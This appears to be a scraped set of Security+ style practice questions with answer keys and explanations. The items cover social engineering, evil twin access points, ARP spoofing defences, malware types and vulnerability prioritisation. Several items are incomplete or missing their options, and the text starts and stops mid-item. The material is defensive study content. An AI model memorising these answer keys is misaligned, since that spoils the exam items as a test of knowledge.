Option A is wrong because phishing relies on deceptive messages (e.g., emails or texts) that trick users into clicking a malicious link or providing credentials, not on compromising the DNS resolution infrastructure. Option B is wrong because spear phishing is a targeted form of phishing that uses personalized messages to deceive a specific individual or group, but it still requires user interaction with a link or attachment, not the manipulation of DNS records.
Two access points are broadcasting the same SSID, but one has a much stronger signal and triggers a suspicious captive portal. That pattern fits an evil twin access point, which imitates a legitimate network to lure users into connecting. The attacker can then intercept traffic or harvest credentials.
Why this answer
The exhibit shows a legitimate access point (SSID: 'CorpNet') with a second, rogue access point broadcasting the same SSID but with a stronger signal. This is the classic behavior of an evil twin attack, where an attacker sets up a fraudulent AP to intercept client connections and capture credentials or sensitive data. The victim's device automatically associates with the stronger signal, believing it is the legitimate network.
Exam trap
The trap here is that candidates confuse an evil twin with a rogue access point—a rogue AP is an unauthorized device plugged into the wired network, while an evil twin is a standalone attacker AP that mimics a legitimate SSID over the air.
How to eliminate wrong answers
Option B is wrong because Bluetooth pairing abuse involves exploiting Bluetooth connections (e.g., Bluejacking, Bluesnarfing), not Wi-Fi SSID spoofing or signal strength manipulation. Option C is wrong because NFC skimming targets contactless payment or data exchange via near-field communication, which operates at a range of ~4 cm and does not involve Wi-Fi access points or SSIDs. Option D is wrong because DNS poisoning corrupts DNS resolver caches to redirect traffic to malicious sites, but the exhibit shows no DNS server manipulation or altered IP resolution—only two APs with the same SSID.
Users on one VLAN report that their traffic to the default gateway is intermittently slow and sometimes reaches the wrong device. A packet capture shows unsolicited ARP replies claiming to be the gateway. Which two actions are the best mitigations on managed switches? Select two.
Select 2 answers
A.enable DHCP snooping so trusted IP-to-MAC bindings can be validated
E.replace private addressing with NAT on every endpoint
AnswersA, B
DHCP snooping builds a trusted binding table that helps security controls distinguish valid host mappings from forged ones. On many managed switches, that table is used to support protections against spoofed layer 2 traffic. It is a standard companion control for preventing local network poisoning attacks.
Why this answer
Option A is correct because DHCP snooping creates a trusted database of IP-to-MAC bindings by monitoring DHCP messages. This database is then used by Dynamic ARP Inspection (DAI) to validate ARP packets, ensuring that only legitimate gateway addresses are accepted. Without DHCP snooping, DAI has no reliable source of truth to compare against, making it ineffective against ARP spoofing attacks.
Exam trap
CompTIA often tests the dependency between DHCP snooping and Dynamic ARP Inspection, so candidates may incorrectly select DAI alone without realizing that DHCP snooping must be enabled first to populate the binding table.
An attacker calls the service desk claiming to be a traveling contractor whose phone was stolen. They know the contractor's manager name and ask for an MFA reset to a new number 'just for today.' Which control would best reduce the success of this attack?
A.Trust any caller who can provide a manager's name and employee ID.
B.Require a callback to a previously verified number and ticket approval before reset.
C.Remove MFA so users are less likely to get locked out while traveling.
D.Use caller ID alone to confirm the person is legitimate.
AnswerB
A callback to a known-good number, combined with ticket validation and approval workflow, forces the request to be verified through independent channels. This defeats the attacker’s ability to rely on stolen or guessed details during the call. It is a practical anti-pretexting control because it reduces trust in information provided by the caller alone.
Why this answer
Option B is correct because it introduces two verification factors that directly counter the social engineering vector: a callback to a previously verified number ensures the requestor is reachable at a known trusted contact point, and ticket approval creates an audit trail and requires secondary authorization. This combination prevents an attacker from simply claiming an identity and requesting a change without independent confirmation, which is the core weakness the attacker exploits.
Exam trap
The trap here is that candidates may think providing a manager's name and employee ID is sufficient proof of identity, but the exam tests that these are easily obtained via reconnaissance and do not constitute multi-factor authentication or out-of-band verification.
How to eliminate wrong answers
Option A is wrong because trusting any caller who provides a manager's name and employee ID is exactly the social engineering trap—the attacker has already demonstrated they possess that information (likely from OSINT or a prior breach), so it provides no real authentication. Option C is wrong because removing MFA entirely weakens security posture and increases the risk of account compromise; the problem is not MFA itself but the process for resetting it, and removing MFA would make all accounts more vulnerable. Option D is wrong because caller ID can be spoofed (e.g., via VoIP or trunk manipulation) and is not a reliable authentication factor; it provides no cryptographic or out-of-band verification.
After installing a free utility from an unofficial website, a user's laptop starts quietly sending browsing data to an unknown server. What type of malware is most likely present?
A.Spyware
B.Ransomware
C.Worm
D.Rootkit
AnswerA
Spyware secretly monitors user activity and sends collected information to a remote attacker. Quietly harvesting browsing data fits this behavior very well.
Why this answer
Spyware is designed to covertly collect user data, such as browsing habits, and transmit it to a remote server without consent. The scenario describes a free utility from an unofficial website that quietly exfiltrates browsing data, which is the classic behavior of spyware. Unlike other malware types, spyware focuses on surveillance and data theft rather than system damage or self-replication.
Exam trap
The trap here is that candidates may confuse spyware with a rootkit because both can operate stealthily, but the key differentiator is the primary objective: spyware focuses on data theft, while a rootkit focuses on hiding other malware or maintaining persistent access.
How to eliminate wrong answers
Option B is wrong because ransomware encrypts files or locks the system to demand a ransom, not to quietly exfiltrate browsing data. Option C is wrong because a worm self-replicates across networks without user interaction, whereas this infection required manual installation of a utility. Option D is wrong because a rootkit hides its presence by subverting OS-level functions (e.g., hooking system calls), but the described symptom—data exfiltration—is not the defining trait; spyware is the more direct classification for data theft.
A caller claims to be from the company's SaaS provider and says a tenant migration will fail unless the help desk reads back a one-time verification code sent to an administrator's phone. The caller knows the admin's name and ticket number. What attack technique is being used?
A.Pretexting, because the attacker is inventing a believable support story to gain trust.
B.Watering hole, because the attacker is targeting a trusted web service used by employees.
C.Tailgating, because the attacker is attempting to bypass a physical security barrier.
D.Whaling, because the attacker is targeting a high-value executive account directly.
AnswerA
The attacker is using a fabricated identity and a credible business scenario to manipulate the help desk into revealing a verification code. That is classic pretexting. The known name and ticket number are used to increase legitimacy, but the key behavior is the false story intended to bypass normal trust checks.
Why this answer
The attacker is using pretexting by fabricating a plausible scenario (a tenant migration requiring a verification code) to manipulate the help desk into divulging sensitive information. This social engineering technique relies on building false trust through invented details like the admin's name and ticket number, rather than exploiting technical vulnerabilities. The goal is to obtain the one-time verification code, which could be used for unauthorized access or account takeover.
Exam trap
The trap here is that candidates may confuse pretexting with whaling because both involve impersonation, but whaling targets high-level executives directly, while pretexting uses a fabricated scenario to trick any employee into performing an action or revealing information.
How to eliminate wrong answers
Option B is wrong because a watering hole attack involves compromising a website or service that the target group frequently uses to infect them with malware, not a direct phone call requesting information. Option C is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area, not a remote social engineering attempt. Option D is wrong because whaling specifically targets high-profile executives (like CEOs) with personalized phishing, whereas this attack targets a help desk employee using a fabricated support story, not a direct executive account compromise.
A security analyst notices that several employees have received an email with the subject line 'Urgent: Password Reset Required'. The email contains a link to a website that mimics the company's internal login portal. The email was sent from an external domain and addresses recipients by 'Dear Employee' rather than their actual names. Which type of social engineering attack is being described?
A.Spear phishing
B.Phishing
C.Vishing
D.Tailgating
AnswerB
Phishing is a broad social engineering technique that uses mass emails to trick users into divulging credentials or clicking malicious links. The generic greeting and external sender domain are consistent with a typical phishing attempt.
Why this answer
The email is sent to multiple employees, uses a generic greeting ('Dear Employee'), and originates from an external domain, which are hallmarks of a broad, untargeted phishing campaign. Spear phishing would involve personalized details (e.g., the recipient's actual name) and targeting specific individuals. Vishing is voice-based, not email.
Therefore, this is a standard phishing attack.
Exam trap
The trap here is that candidates confuse 'phishing' with 'spear phishing' because both use email and fake login pages, but the key differentiator is the level of personalization—generic vs. targeted—which the 'Dear Employee' greeting explicitly reveals.
How to eliminate wrong answers
Option A is wrong because spear phishing requires the attacker to research and personalize the email with the recipient's actual name, job title, or other specific details, whereas this email uses the generic 'Dear Employee'. Option C is wrong because vishing (voice phishing) is conducted over phone calls or VoIP, not through email with a link to a fake login portal.
During a workstation review, analysts find a process injecting into explorer.exe and reading keyboard and clipboard events. They also see repeated outbound HTTPS beacons to a domain registered two days ago. The host is not renaming files or displaying a ransom note. Which two findings are most consistent with spyware? Select two.
Select 2 answers
A.A process injects into explorer.exe and monitors keyboard and clipboard activity.
B.The host sends repeated HTTPS beacons to a domain registered two days ago.
C.User files are renamed with a new extension and a ransom note appears.
D.CPU usage spikes only during a scheduled operating system update.
E.The browser certificate store was refreshed after applying a patch.
AnswersA, B
Process injection into a user shell process combined with keyboard and clipboard monitoring is highly consistent with spyware. Those behaviors are designed to silently capture sensitive information such as credentials, messages, and copied data while blending into normal desktop activity. That stealthy information-gathering focus is a hallmark of spyware.
Why this answer
Option A is correct because process injection into a trusted system process like explorer.exe, combined with monitoring keyboard and clipboard events, is a classic spyware technique. Spyware aims to covertly capture sensitive user input (keystrokes and clipboard data) for exfiltration, without causing immediate system damage or displaying a ransom note.
Exam trap
The trap here is that candidates may confuse spyware with ransomware (option C) or mistake normal system maintenance (options D and E) for malicious activity, failing to recognize that spyware's defining characteristics are stealthy data capture and covert C2 communication without overt file encryption or ransom demands.
Threat intelligence shows an attacker changes the domain name every day, but the malware file hash stays the same across incidents. What should defenders prioritize for blocking?
A.The daily domain names, because they are the easiest indicator to find.
B.The malware file hash, because it remains consistent across incidents.
C.The color of the phishing email, because visual style is unique to the attacker.
D.The user's browser homepage, because attackers often change it after infection.
AnswerB
A consistent file hash is a stable indicator of the malicious sample and is easier to block or detect across multiple cases.
Why this answer
Option B is correct because the malware file hash (e.g., MD5, SHA-1, or SHA-256) is a static, deterministic value derived from the malware's binary content. Since the attacker reuses the same malware across incidents, the hash remains consistent, making it a reliable indicator of compromise (IOC) for blocking via hash-based allow/deny lists in endpoint protection or network security controls. In contrast, domain names change daily (fast flux), so blocking them is less sustainable and requires constant updates.
Exam trap
The trap here is that candidates may assume domain names are the easiest to block because they are visible in logs, but the question tests the principle of prioritizing stable, consistent indicators over ephemeral ones, and CompTIA often tests this by contrasting static hashes with dynamic domains in fast-flux scenarios.
How to eliminate wrong answers
Option A is wrong because daily domain names are volatile and require frequent updates to block lists, making them less efficient than a static hash; they are not the 'easiest' indicator to find in practice, as they often use fast-flux DNS to evade detection. Option C is wrong because the color of a phishing email is a superficial, non-unique attribute that can be easily altered by the attacker and is not a reliable technical IOC for blocking. Option D is wrong because the user's browser homepage is a post-infection artifact that varies by user and system, not a consistent attacker-controlled indicator; attackers may change it, but it is not a primary blocking target.
Finance staff receive an email from the 'CFO' using a lookalike domain. The message requests an urgent gift-card purchase, says the recipient must keep it confidential, and pressures them to skip normal approval steps. What attack is this most likely?
A.Watering-hole attack targeting employees through a compromised website.
B.Smishing attempt delivered through a text message to a mobile phone.
C.Business email compromise using executive impersonation and urgency.
D.Credential stuffing against the CFO's mailbox using previously leaked passwords.
AnswerC
The attacker is impersonating a senior leader, using a lookalike domain, and pressuring the target to bypass normal controls. That combination is typical of business email compromise and executive impersonation. The request for secrecy and urgency is designed to defeat verification and approval workflows, which makes this attack especially effective in finance-related fraud attempts.
Why this answer
Option C is correct because this scenario describes a business email compromise (BEC) attack where the threat actor impersonates an executive (the CFO) using a lookalike domain to trick a finance employee into making an unauthorized gift-card purchase. The use of urgency, confidentiality, and pressure to bypass normal approval processes are classic BEC social engineering tactics, not technical exploits.
Exam trap
The trap here is that candidates may confuse BEC with credential stuffing (option D) because both involve email accounts, but BEC relies on social engineering to trick the recipient into taking action, not on stealing credentials to access the CFO's mailbox.
How to eliminate wrong answers
Option A is wrong because a watering-hole attack involves compromising a website that the target group frequently visits to deliver malware, not sending a direct email impersonating an executive. Option B is wrong because smishing is a phishing attack delivered via SMS/text messages, not email; this scenario explicitly describes an email from a lookalike domain. Option D is wrong because credential stuffing uses previously leaked usernames and passwords to gain unauthorized access to an account, not social engineering via email to request a gift-card purchase.
A vulnerability scan reports three findings: a critical remote code execution issue on an internet-facing VPN appliance with a public exploit, a high-severity local privilege escalation on an isolated lab PC, and a medium-severity outdated browser plug-in on a workstation used for training. Which finding should be remediated first?
A.The isolated lab PC, because local privilege escalation is always the highest technical severity.
B.The internet-facing VPN appliance, because it combines critical severity, exposure, and public exploit availability.
C.The training workstation, because browser plug-ins are common entry points for attackers.
D.None of them, because all vulnerability findings should wait for the next planned maintenance cycle.
AnswerB
The VPN appliance should be first because it is exposed to the internet, has a critical vulnerability, and has known exploit code available. That combination significantly increases the likelihood and impact of compromise, making it the most urgent remediation target.
Why this answer
The internet-facing VPN appliance should be remediated first because it combines a critical severity rating, direct exposure to the internet, and a publicly available exploit. This creates an immediate and high-probability risk of remote code execution, which could lead to full compromise of the network perimeter. In contrast, the other findings are isolated or lower severity, making them less urgent.
Exam trap
The trap here is that candidates may prioritize based solely on severity score or common attack vectors (like browser plug-ins) without considering the combination of exposure, exploit availability, and the critical nature of the vulnerability.
How to eliminate wrong answers
Option A is wrong because local privilege escalation on an isolated lab PC, while serious, does not have the same risk as a critical remote code execution on an internet-facing device; the lab PC is not exposed to external threats and requires prior access. Option C is wrong because a medium-severity outdated browser plug-in on a training workstation is a lower priority than a critical vulnerability with a public exploit on an internet-facing system; browser plug-ins are common entry points but the severity and exposure are lower. Option D is wrong because waiting for the next planned maintenance cycle for a critical, internet-facing vulnerability with a public exploit is unacceptable; such issues require immediate remediation to prevent exploitation.
Dynamic ARP inspection is designed to block forged ARP messages by checking them against trusted information, usually built from DHCP snooping bindings. Since the switch logs show both DHCP snooping and ARP inspection disabled, enabling these controls is the most appropriate mitigation for the poisoning behavior described.
Why this answer
Dynamic ARP inspection (DAI) with DHCP snooping validates ARP packets against a trusted binding database, preventing man-in-the-middle attacks where an attacker spoofs the MAC address of a legitimate host (e.g., the default gateway) to intercept traffic. The exhibit likely shows a scenario of ARP spoofing or cache poisoning, which DAI directly mitigates by dropping invalid ARP replies. DHCP snooping builds the trusted binding table by recording which IP address is assigned to which MAC address on which port.
Exam trap
The trap here is that candidates confuse DNSSEC (which secures DNS) with ARP security mechanisms, or they assume port forwarding or load balancing can mitigate Layer 2 spoofing attacks, when in fact only DAI with DHCP snooping directly validates ARP integrity.
How to eliminate wrong answers
Option A is wrong because DNSSEC validates DNS records (using digital signatures) to prevent DNS spoofing/cache poisoning, not local address-to-MAC spoofing (ARP attacks). Option B is wrong because port forwarding is a NAT technique to map external ports to internal hosts, and it does not inspect or validate Layer 2 ARP traffic. Option C is wrong because load balancing distributes network or application traffic across multiple servers to improve performance and availability, but it does not enforce ARP security or prevent spoofing at the data link layer.
A vulnerability scan finds an administrative SSH service listening on 0.0.0.0 on a server that should be managed only from the internal network. What is the main security issue?
A.Exposed management service
B.Default credentials
C.Outdated component
D.Weak permissions
AnswerA
This is the correct answer because the admin SSH service is reachable on all interfaces instead of being limited to the internal management network. That increases attack surface and allows unauthorized internet exposure if firewall rules are weak or missing. The problem is the service placement and exposure, not the SSH protocol itself.
Why this answer
The SSH service binding to 0.0.0.0 means it is listening on all network interfaces, including external-facing ones. This exposes the administrative management interface to potentially untrusted networks, violating the principle of least privilege and increasing the attack surface. The main security issue is that a service intended for internal management only is accessible from outside the trusted internal network.
Exam trap
The trap here is that candidates may focus on the SSH service itself (e.g., thinking of weak passwords or outdated versions) rather than recognizing that the binding to 0.0.0.0 is a network exposure misconfiguration.
How to eliminate wrong answers
Option B is wrong because the question does not mention any use of default usernames or passwords; the core issue is network exposure, not authentication weakness. Option C is wrong because there is no indication that the SSH version or component is outdated; the vulnerability is about misconfiguration, not patch level. Option D is wrong because weak permissions refer to file system or registry access controls, not network-level binding; the SSH service itself may have correct file permissions but still be exposed on the network.
Based on the exhibit, which malware type is most likely involved?
A.Trojan, because the malware was likely disguised as a legitimate file.
B.Spyware, because the attacker is trying to monitor user activity quietly.
C.Ransomware, because files were encrypted and recovery options were intentionally removed.
D.Rootkit, because the attacker is hiding from the operating system.
AnswerC
This is ransomware. The file extensions changed, a ransom note was dropped into folders, and Volume Shadow Copy data was deleted to hinder recovery. Those are classic signs that the attacker intends to deny access to data and pressure the victim into payment. The visible symptom is loss of file availability, not stealthy monitoring or simple corruption.
Why this answer
The exhibit shows that files have been encrypted with a '.locked' extension and that recovery options like System Restore and Volume Shadow Copy have been removed or disabled. This is a classic indicator of ransomware, which encrypts user data and then demands payment for decryption, often deleting backup files to prevent recovery without the attacker's key.
Exam trap
The trap here is that candidates may confuse the removal of recovery options with a rootkit's stealth techniques, but ransomware's goal is to deny access to data (not hide), and the overt encryption and backup deletion are the key differentiators.
How to eliminate wrong answers
Option A is wrong because a trojan is malware disguised as legitimate software, but the exhibit shows file encryption and removal of recovery options, not just deception. Option B is wrong because spyware focuses on stealthy monitoring of user activity (e.g., keylogging or screen capture), not on encrypting files and deleting backups. Option D is wrong because a rootkit hides its presence from the operating system (e.g., by hooking system calls), whereas the exhibit shows overt file encryption and system recovery tampering, not stealth.
A help desk technician receives a phone call from someone who claims to be the CFO. The caller knows the executive team structure, says they are traveling, and insists the technician reset MFA to 'avoid delaying a wire transfer.' Which social engineering technique is the caller primarily using?
A.Pretexting, because the caller builds a believable story to manipulate the employee
B.Baiting, because the caller is offering something valuable in exchange for action
C.Vishing, because the attack happens by voice call
D.Smishing, because the attacker is using a mobile device
AnswerA
Pretexting is the best fit because the attacker invents a convincing scenario, uses insider details, and pressures the technician to bypass normal verification. The goal is not just to trick someone into clicking a link, but to create a false identity and narrative that makes the request seem legitimate. This is a common tactic in help desk fraud and account takeover attempts.
Why this answer
The caller is using pretexting because they have fabricated a scenario (the CFO traveling and needing an urgent wire transfer) and assumed a false identity to manipulate the help desk technician into resetting MFA. Pretexting relies on a crafted story or pretext to gain trust and bypass security controls, which is exactly what the caller is doing here.
Exam trap
The trap here is that candidates often confuse the delivery method (voice call = vishing) with the underlying social engineering technique (pretexting), but the question specifically asks for the primary technique being used, not the channel.
How to eliminate wrong answers
Option B is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to trick the victim, not creating a false identity or story. Option C is wrong because vishing is a social engineering technique that uses voice calls, but the question asks for the primary technique being used, not the delivery method; the core technique here is pretexting, not vishing. Option D is wrong because smishing specifically refers to SMS-based phishing attacks, and while the caller may be using a mobile device, the attack is carried out via a phone call, not text messages.
A branch office reports intermittent failures reaching internal sites. DHCP logs show clients receiving leases from an unknown MAC address, and DNS responses for intranet.example resolve to an address owned by the same device. Which two attacks best match the evidence? Select two.
Select 2 answers
A.A rogue DHCP server is issuing unauthorized lease information.
B.DNS spoofing or poisoning is directing users to the wrong host.
D.A port scan is enumerating exposed services on the branch subnet.
E.Password spraying is attempting many logins with common passwords.
AnswersA, B
Clients are receiving leases from an unknown MAC address, which strongly suggests an unauthorized DHCP server on the network. A rogue server can hand out incorrect gateway, DNS, or lease settings and quickly disrupt connectivity. That makes it a direct match for the observed lease behavior.
Why this answer
A rogue DHCP server on the network can issue unauthorized lease information, causing clients to receive IP configurations from an unknown MAC address. This matches the DHCP log evidence and can lead to intermittent connectivity issues as clients receive conflicting or incorrect network settings.
Exam trap
The trap here is that candidates may confuse DHCP starvation (which exhausts the legitimate pool) with a rogue DHCP server, but the evidence of unknown MAC addresses in leases directly points to an unauthorized server, not resource exhaustion.
A scan of a web server hosting an internal help-desk portal reports these findings: `/var/www/uploads` is world-writable by the application account, PHP files in that directory are executed by Apache, and the app allows users to upload images without content-type validation. Which issue should be remediated first to most reduce the chance of remote code execution?
A.Outdated browser plug-in on an admin workstation, because it may expose users to drive-by attacks.
B.Default SNMP community string on a printer in a separate VLAN, because it weakens network monitoring.
C.World-writable executable upload path, because an attacker could upload or modify server-executable code in a web-accessible directory.
D.Missing disk encryption on a help-desk laptop, because stolen devices are a common breach source.
AnswerC
The world-writable, web-executable upload path is the most urgent issue because it creates a direct path to remote code execution. If an attacker can place or alter files in a directory that Apache executes, they may be able to run arbitrary server-side code. The lack of content-type validation increases the chance that a malicious payload will be accepted as a harmless file upload.
Why this answer
Option C is correct because the combination of a world-writable upload directory, PHP execution in that directory, and no content-type validation allows an attacker to upload a malicious PHP file (e.g., a web shell) and execute it via the web server, achieving remote code execution. This directly exploits the server's trust in user-supplied files and the execution context of Apache, making it the most immediate and severe risk.
Exam trap
The trap here is that candidates may focus on the 'world-writable' aspect alone, but the critical chain is the combination of writable upload path, PHP execution, and lack of content-type validation, which together enable direct remote code execution; other options are valid security concerns but do not address the immediate RCE risk.
How to eliminate wrong answers
Option A is wrong because an outdated browser plug-in on an admin workstation is a client-side vulnerability that requires user interaction (e.g., visiting a malicious site) and does not directly enable remote code execution on the web server itself. Option B is wrong because a default SNMP community string on a printer in a separate VLAN primarily exposes network configuration data and could allow information disclosure or denial of service, but it does not provide a path to execute arbitrary code on the help-desk portal server. Option D is wrong because missing disk encryption on a help-desk laptop addresses data-at-rest protection against physical theft, which is a different threat vector (confidentiality breach) and does not mitigate remote code execution on the live web server.
Based on the exhibit, what type of malware is most likely present?
A.Logic bomb
B.Worm
C.Spyware
D.Rootkit
AnswerA
The malicious action is set to occur only when a specific condition is met, in this case a date trigger and a username check. That makes it a logic bomb. Logic bombs stay hidden until a trigger event occurs, then they execute destructive or unauthorized actions such as deleting files.
Why this answer
The exhibit shows a script that checks for a specific employee name and, if the condition is met, deletes critical system files. This is a classic logic bomb: malicious code embedded in a legitimate program that executes when predefined conditions (e.g., a specific user, date, or event) are satisfied. Logic bombs do not self-replicate or continuously spy; they lie dormant until triggered.
Exam trap
The trap here is that candidates confuse a logic bomb with a worm because both can cause damage, but they fail to recognize that a logic bomb requires a specific trigger condition and does not self-replicate, unlike a worm which spreads automatically.
How to eliminate wrong answers
Option B (Worm) is wrong because a worm self-replicates and spreads across networks without user interaction, whereas this script requires manual execution and does not propagate. Option C (Spyware) is wrong because spyware covertly collects user data (e.g., keystrokes, browsing habits) and sends it to an attacker, but this script destroys files without exfiltrating information. Option D (Rootkit) is wrong because a rootkit hides its presence and provides persistent privileged access by modifying OS kernel or system calls, whereas this script is a simple conditional deletion routine with no stealth or persistence mechanisms.
Based on the exhibit, which indicator should the security team prioritize for endpoint detection and hunting?
The attacker rotates infrastructure frequently, but one artifact has remained consistent across recent investigations.
A.The current source IP addresses hosting the payloads
B.The unique mutex name created by the malware on infected endpoints
C.The exact wording of the latest phishing email lure
D.The filename of the attachment used in the most recent incident
AnswerB
The mutex is a host-based artifact that the malware consistently creates, making it a stronger and more durable detection point than rotating domains or repacked hashes.
Why this answer
Option B is correct because a mutex (mutual exclusion object) is a unique artifact created by malware to prevent multiple instances of itself from running on the same endpoint. Since the attacker rotates infrastructure frequently (IPs, domains, filenames), the consistent mutex name provides a stable indicator of compromise (IoC) that can be used for endpoint detection and hunting across different incidents. This makes it a reliable signature for identifying the same malware family or variant even when other indicators change.
Exam trap
The trap here is that candidates focus on easily changed artifacts (IPs, filenames, email content) rather than recognizing that mutexes are often hardcoded in malware binaries and persist across infrastructure changes, making them a more stable indicator for detection.
How to eliminate wrong answers
Option A is wrong because source IP addresses hosting payloads are frequently rotated by attackers (e.g., using fast-flux DNS or cloud instances), making them unreliable for persistent detection. Option C is wrong because the exact wording of phishing email lures can be easily altered by attackers in subsequent campaigns, and email content is often filtered or modified by security gateways, reducing its forensic value. Option D is wrong because filenames of attachments are trivial to change (e.g., using random or polymorphic naming), and attackers often use different filenames in each wave to evade signature-based detection.
A SOC analyst reviews an alert on a workstation where PowerShell launched from a scheduled task, downloaded an encoded command from a remote server, and then spawned rundll32.exe. Traditional antivirus did not flag any files on disk, and the activity stops after rebooting the host. Which type of malware behavior best fits this event?
A.Worm behavior that is spreading through SMB shares
B.Fileless attack using trusted system tools to run malicious code in memory
C.Rootkit that is hiding itself by modifying kernel drivers
D.Trojan that can only run after a user manually opens a malicious attachment
AnswerB
This matches a fileless attack because the malicious activity relies on built-in tools like PowerShell and rundll32 rather than an obvious executable on disk. The alert shows code being fetched and executed from memory, which often evades traditional file-based antivirus detection. The fact that the behavior disappears after reboot further supports a memory-resident, fileless technique.
Why this answer
The attack uses PowerShell to download and execute an encoded command directly in memory, then spawns rundll32.exe—both are trusted Microsoft binaries. No files are written to disk, and the activity ceases after reboot, which are hallmarks of a fileless malware attack that operates entirely in volatile memory.
Exam trap
The trap here is that candidates may associate any scheduled task or PowerShell activity with a worm or Trojan, but the key differentiator is the absence of disk writes and the use of memory-only execution, which is the defining characteristic of a fileless attack.
How to eliminate wrong answers
Option A is wrong because worm behavior spreading through SMB shares typically involves file-based replication and network scanning (e.g., EternalBlue), not a scheduled task launching PowerShell to download an encoded command and spawn rundll32.exe. Option C is wrong because a rootkit that modifies kernel drivers would persist across reboots and often evade detection by hiding processes or files, but here the activity stops after reboot and no kernel-level modification is indicated. Option D is wrong because a Trojan requiring manual user attachment opening does not match the automated scheduled task trigger and the use of encoded remote commands; the attack is initiated by a scheduled task, not user interaction.
A user receives a phone call from someone who claims to be a member of the company's IT support team. The caller states that the user's account has been compromised and requests the user's username, password, and the current multi-factor authentication (MFA) code to 'verify identity and secure the account.' Which type of social engineering attack is being attempted?
A.Spear phishing
B.Vishing
C.Pretexting
D.Tailgating
AnswerB
Vishing (voice phishing) is a social engineering attack conducted over the phone. The attacker impersonates a trusted entity to trick the victim into revealing sensitive information such as passwords and MFA codes.
Why this answer
B is correct because vishing (voice phishing) is a social engineering attack conducted over the phone, where the attacker impersonates a trusted entity (IT support) to trick the victim into revealing sensitive information such as credentials and MFA codes. The request for the current MFA code is a key indicator, as it would allow the attacker to bypass multi-factor authentication in real time.
Exam trap
The trap here is confusing vishing with pretexting, as both involve deception, but vishing specifically uses voice (phone) as the attack vector, while pretexting is a broader category that can occur through any communication channel.
How to eliminate wrong answers
Option A is wrong because spear phishing is a targeted email-based attack that uses deceptive messages to trick the recipient into clicking a malicious link or opening an attachment, not a phone call. Option C is wrong because pretexting involves creating a fabricated scenario (pretext) to obtain information, but it is not limited to phone calls and often occurs in person or via email; the question specifically describes a phone call, which is the hallmark of vishing. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area without proper authentication, not a phone-based social engineering attempt.
A support portal lets users upload files and name them manually. During review, a tester submits a filename containing path traversal sequences, and logs later show the application trying to access files outside the intended upload folder. Which two changes best address the flaw? Select two.
Select 2 answers
A.Validate and canonicalize the filename on the server, then allow only approved name patterns.
B.Store uploads outside the web root and deny execution permissions on the upload directory.
C.Increase the maximum upload size so the application can handle more files.
D.Add browser-side JavaScript validation to reject suspicious filenames.
E.Hide detailed error messages from end users only.
AnswersA, B
Server-side canonicalization and allowlisting stop attackers from escaping the expected directory structure. Client-side checks are not enough because attackers can modify requests directly. This is the most direct way to prevent traversal sequences from being interpreted as filesystem paths.
Why this answer
Option A is correct because server-side validation and canonicalization (e.g., using `realpath()` or `Path.GetFullPath()`) resolves path traversal sequences like `../` to an absolute path, which can then be checked against an allowlist of permitted patterns. This prevents the application from following malicious sequences to access files outside the intended upload directory. Without canonicalization, simple string filtering can be bypassed by encoding or alternative traversal patterns.
Exam trap
CompTIA often tests the misconception that client-side validation or error message hiding is sufficient to prevent server-side attacks, when in fact only server-side canonicalization and allowlisting can stop path traversal.
An organization wants to reduce the risk of malware infections from removable media. Which three of the following controls should be implemented? (Choose three.)
Select 3 answers
.Disabling AutoRun and AutoPlay features
.Enforcing a policy of full disk encryption on all removable drives
.Using group policy to block execution from removable media
.Scanning all removable media with antivirus software upon insertion
.Requiring all removable media to be formatted as NTFS
Disabling AutoRun and AutoPlay features prevents malicious code from executing automatically when removable media is inserted, which is a common infection vector. Using group policy to block execution from removable media stops any executable files from running, even if manually launched. Scanning all removable media with antivirus software upon insertion detects and quarantines known malware before it can interact with the system.
Exam trap
The trap here is that candidates often confuse data protection controls (like encryption) with execution prevention controls, or they assume that file system formatting (NTFS) provides security against malware execution.
Several employees receive a text message that says their payroll deposit failed and they must tap a link to verify account details. The link opens a fake login page. What type of attack is this?
A.Phishing
B.Smishing
C.Pretexting
D.Baiting
AnswerB
Smishing is phishing delivered through SMS or other text messaging services.
Why this answer
Smishing is a form of phishing that uses SMS (Short Message Service) text messages as the attack vector. In this scenario, the attacker sends a fraudulent text message claiming a payroll deposit failure and includes a link to a fake login page, which is the classic mechanism of smishing. The attack relies on social engineering via SMS to trick the recipient into revealing sensitive credentials.
Exam trap
The trap here is that candidates often confuse 'smishing' with general 'phishing' because they do not differentiate the delivery vector (SMS vs. email), but the SY0-701 exam expects you to identify the specific attack type based on the communication channel used.
How to eliminate wrong answers
Option A is wrong because phishing is a broad category of social engineering attacks typically carried out via email, not specifically via SMS text messages; while smishing is a subset of phishing, the question explicitly describes an SMS-based attack, making 'smishing' the more precise term. Option C is wrong because pretexting involves fabricating a scenario (pretext) to obtain information, often through impersonation or a false backstory, but it does not necessarily involve a direct link to a fake login page or the use of SMS as the delivery mechanism. Option D is wrong because baiting relies on offering something enticing (e.g., a free download or USB drive) to lure the victim into a trap, whereas this attack uses a false sense of urgency (payroll failure) and a link to a fake login page, which is characteristic of smishing, not baiting.
A finance manager gets a phone call from someone claiming to be the CEO's assistant, urgently requesting a wire transfer before a board meeting. What type of attack is this?
A.Smishing
B.Vishing
C.Spear phishing
D.Watering-hole attack
AnswerB
This is a phone-based social engineering attempt that uses urgency and impersonation.
Why this answer
B is correct because vishing (voice phishing) uses a phone call to socially engineer the victim into performing a sensitive action, such as a wire transfer. The attacker impersonates a trusted authority (the CEO's assistant) and exploits urgency to bypass normal verification procedures. This is distinct from text-based phishing (smishing) or targeted email attacks (spear phishing).
Exam trap
The trap here is that candidates confuse the delivery method (phone call) with the attack type, often choosing 'spear phishing' because the target is a specific individual, but the defining characteristic is the voice channel, not the targeting precision.
How to eliminate wrong answers
Option A is wrong because smishing relies on SMS/text messages, not voice calls, to deliver the phishing lure. Option C is wrong because spear phishing is a targeted email attack that uses personalized content, not a real-time phone conversation. Option D is wrong because a watering-hole attack compromises a legitimate website frequented by the target group to deliver malware, not a direct social engineering call.
A vulnerability scan produces these results:
- Finding 1: High severity, internet-facing VPN appliance, known exploit available, no compensating controls
- Finding 2: Critical severity, internal development workstation, requires authenticated local access
- Finding 3: Medium severity, test server, no public exploit and not reachable from outside
Which finding should be remediated first?
A.Finding 1
B.Finding 2
C.Finding 3
D.All findings are equal because the severity rating alone determines priority
AnswerA
An internet-facing VPN with known exploit code and no compensating controls presents the highest practical risk because it is exposed and readily exploitable.
Why this answer
